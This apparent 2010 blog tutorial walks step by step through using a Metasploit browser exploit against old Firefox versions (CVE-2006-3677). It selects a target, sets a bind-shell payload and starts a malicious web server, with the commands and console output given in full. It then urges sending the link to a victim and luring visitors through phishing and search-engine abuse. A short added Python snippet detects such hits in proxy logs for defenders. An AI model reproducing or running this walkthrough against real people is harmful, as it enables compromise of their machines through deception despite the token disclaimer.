Tuesday, November 30, 2010

Using Metasploit

# ./msfconsole



=[ msf v3.1-dev
+ -- --=[ 216 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 40 aux

msf >


To list the available exploits:

msf > show exploits

Exploits
========

Name Description
---- -----------
bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow
hpux/lpd/cleanup_exec HP-UX LPD Command Execution
irix/lpd/tagprinter_exec Irix LPD tagprinter Command Execution
linux/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Linux)
linux/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
linux/ids/snortbopre Snort Back Orifice Pre-Preprocessor Remote Exploit
linux/madwifi/madwifi_giwscan_cb Madwifi SIOCGIWSCAN Buffer Overflow
linux/misc/interbase_create Borland Interbase 2007 Create Request Buffer Overflow
linux/pptp/poptop_negative_read Poptop Negative Read Overflow
linux/proxy/squid_ntlm_authenticate Squid NTLM Authenticate Overflow
linux/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow
multi/browser/firefox_queryinterface Firefox location.QueryInterface() Code Execution
multi/browser/mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
multi/browser/mozilla_navigatorjava Mozilla Suite/Firefox Navigator Object Code Execution
Gathering information about the exploit we are going to use:

msf > info multi/browser/mozilla_navigatorjava

Name: Mozilla Suite/Firefox Navigator Object Code Execution
Version: 4646
Platform:
Privileged: No
License: Metasploit Framework License

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Firefox 1.5.0.4 Windows x86
1 Firefox 1.5.0.4 Linux x86
2 Firefox 1.5.0.4 Mac OS X PPC
3 Firefox 1.5.0.4 Mac OS X x86

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 512
Avoid: 0 characters

Description:
This module exploits a code execution vulnerability in the Mozilla
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This
exploit requires the Java plugin to be installed.

References:
http://www.securityfocus.com/bid/19192
http://www.osvdb.org/27559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3677
http://www.mozilla.org/security/announce/mfsa2006-45.html
http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html

msf >


Selecting the exploit:

msf > use multi/browser/mozilla_navigatorjava
msf exploit(mozilla_navigatorjava) >

The info output showed that the module has several targets; I'll select target 1 (Firefox 1.5.0.4 on Linux x86):

msf exploit(mozilla_navigatorjava) > set TARGET 1
TARGET => 1
msf exploit(mozilla_navigatorjava) >


As seen in the info output above, SRVHOST and SRVPORT already have default values and URIPATH is optional, so you may or may not set them. As an example I'll set URIPATH, then run `set` with no arguments to review the module's current options:

msf exploit(mozilla_navigatorjava) > set URIPATH spooker
URIPATH => spooker
msf exploit(mozilla_navigatorjava) > set

Global
======

No entries in data store.

Module: multi/browser/mozilla_navigatorjava
===========================================

Name Value
---- -----
HTML::base64 none
HTML::javascript::escape 0
HTML::unicode none
HTTP::chunked false
HTTP::compression none
HTTP::header_folding false
HTTP::junk_headers false
SRVHOST 0.0.0.0
SRVPORT 8080
TCP::max_send_size 0
TCP::send_delay 0
URIPATH spooker

msf exploit(mozilla_navigatorjava) >

Now we need to select the PAYLOAD. Let's list the compatible payloads to find one that suits us:

msf exploit(mozilla_navigatorjava) > show payloads

Compatible payloads
===================

Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline

msf exploit(mozilla_navigatorjava) >


All that is left is to set the payload and run the exploit:

msf exploit(mozilla_navigatorjava) > set PAYLOAD generic/shell_bind_tcp
PAYLOAD => generic/shell_bind_tcp
msf exploit(mozilla_navigatorjava) > exploit
[*] Using URL: http://0.0.0.0:8080/spooker
[*] Local IP: http://192.168.5.139:8080/spooker
[*] Server started.
[*] Exploit running as background job.
msf exploit(mozilla_navigatorjava) >


Now just send the link to the target whose shell you want. Remember that this must not be used without permission; use it for educational purposes. If you wish, you can also combine it with flaws in the big search engines, such as Yahoo and Google, and point them at your machine (see the post on Phishing for pentests).

When someone connects, you will see:

msf exploit(mozilla_navigatorjava) >
[*] Sending exploit to 192.168.5.138:60864...
[*] Started bind handler
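From the defender's side, the connection logged above is an ordinary browser request to an HTTP server on a non-standard port. As an added example (not part of the original post or of Metasploit), the Python below triages constructed proxy log lines and flags clients matching both indicators the walkthrough gives: a Firefox version at or below the module's target version (1.5.0.4) and a request to a port other than 80/443. The log format, the sample lines and the `suspect_clients` function are assumptions of this example.

```python
import re
from urllib.parse import urlsplit
from typing import List, Optional, Tuple

# Constructed proxy log lines (not from the original post). Assumed format:
#   <client_ip> <method> <url> "<user-agent>"
SAMPLE_LOG = """\
192.168.5.138 GET http://192.168.5.139:8080/spooker "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
192.168.5.140 GET http://intranet.example/index.html "Mozilla/5.0 (Windows NT 6.1; rv:3.6.12) Gecko/20101026 Firefox/3.6.12"
192.168.5.141 GET http://192.168.5.139:8080/AbCdEf "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
192.168.5.142 GET http://www.example.org/ "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"
"""

# Highest Firefox version in the module's target list (all targets are 1.5.0.4).
TARGETED_MAX = (1, 5, 0, 4)
STANDARD_PORTS = {80, 443}

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')
FF_RE = re.compile(r"Firefox/(\d+(?:\.\d+)*)")


def firefox_version(user_agent: str) -> Optional[Tuple[int, ...]]:
    """Return the Firefox version as an int tuple, or None for other browsers."""
    m = FF_RE.search(user_agent)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_targeted_browser(user_agent: str) -> bool:
    """True when the UA is Firefox at or below the version the module targets."""
    ver = firefox_version(user_agent)
    return ver is not None and ver <= TARGETED_MAX


def uses_nonstandard_port(url: str) -> bool:
    """True when the request goes to an HTTP(S) port other than 80/443."""
    parts = urlsplit(url)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return port not in STANDARD_PORTS


def suspect_clients(log_text: str) -> List[str]:
    """Client IPs where a targeted-version Firefox hit a non-standard port."""
    flagged = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crashing
        client, _method, url, ua = m.groups()
        # Both indicators must hold; an old browser on ordinary sites is not flagged.
        if is_targeted_browser(ua) and uses_nonstandard_port(url):
            flagged.append(client)
    return flagged
```

Clients 192.168.5.138 and 192.168.5.141 are flagged; 192.168.5.142 runs the same old browser but only reached a standard port, so it is left for a separate patch-level follow-up rather than treated as an exploit hit.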


Site: http://www.metasploit.org/

Cheers, and use it carefully.
